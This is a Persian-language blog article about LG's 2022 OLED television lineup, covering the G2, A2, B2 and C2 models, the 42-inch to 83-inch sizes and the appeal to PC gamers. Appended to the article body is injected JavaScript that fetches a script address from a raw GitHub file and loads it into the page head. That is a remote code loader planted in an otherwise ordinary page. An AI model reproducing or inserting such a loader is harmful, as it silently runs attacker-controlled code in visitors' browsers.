دسته‌بندی نشده

معرفی تولیدات 2022 کمپانی ال جی

همانطور که سامسونگ قرار است تلویزیون های خود را با پنل های جدید QD-OLED عرضه کند. سال 2022 قرار است سالی فوق العاده برای طرفداران تلویزیون های OLED کمپانی ال جی محسوب شود. ال جی اولین و بزرگ ترین تولید کننده پنل های اولد است به همین دلیل واکنش این برند نسبت به پیشنهادات سامسونگ درباره پنل های جدیدش بسیار مورد توجه همگان قرار گرفته شده است اما به دلیل مشخص و تایید شدن خط تولیدی 2022 ال جی به احتمال زیاد این واکنش در سال 2023 اتفاق خواهد افتاد.
بنابر تست ها و ازمایشات انجام شده گفته می شود که تلویزیون های سری جدید از ال جی قرار است با نامگذاری مشخص و همگی ان ها با پسوند های 2 عرضه شوند به این صورت که نامگذاری ان ها شامل G2, A2, B2 و C2 خواهد بود. ال جی قرار است در این مدل ها سایز 42 اینچ را به عنوان کوچک ترین مدل و 83 اینچ را برای مدل G2 و به عنوان بزرگ ترین نمایشگر ارائه دهد.
تلویزیون OLED ال جی هم اکنون در بین گیمر های کنسول بسیار محبوب هستند اما این برند در سدد راضی کردن گیمر های PC می باشد که اضافه کردن سایز 48 اینچ برای مدل های 2020 و 2021 مهر تاییدی بر این موضوع می باشد. با کوچک شدن سایز تلویزیون ها در سال 2022 ال جی می خواهد مدل C2 را به بهترین و پر فروش ترین تلویزیون برای گیمر و استفاده به عنوان مانیتور تبدیل کند. این تلویزیون به عنوان کوچک ترین مدل 42 اینچی دارای بالاترین تعداد پیکسل در هر اینچ است و گرافیک بسیار قوی و واضح را برای بازی ها ارائه می دهد. این صفحه نمایش می تواند با وجود اندازه بسیار کوچک روشنایی فو ق  العاده ای را ایجاد خواهد کرد.
علاوه بر این ال جی در حال اماده سازی برای معرفی مدل G2 در اندازه 83 اینچ می باشد و می خواهد ان را با امکانات ویژه برای پیشی گرفتن از تلویزیون های سونی و پاناسونیک عرضه کند. انتظار می رود که در این تلویزیون از پنل های درخشان Evo استفاده شود. 
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *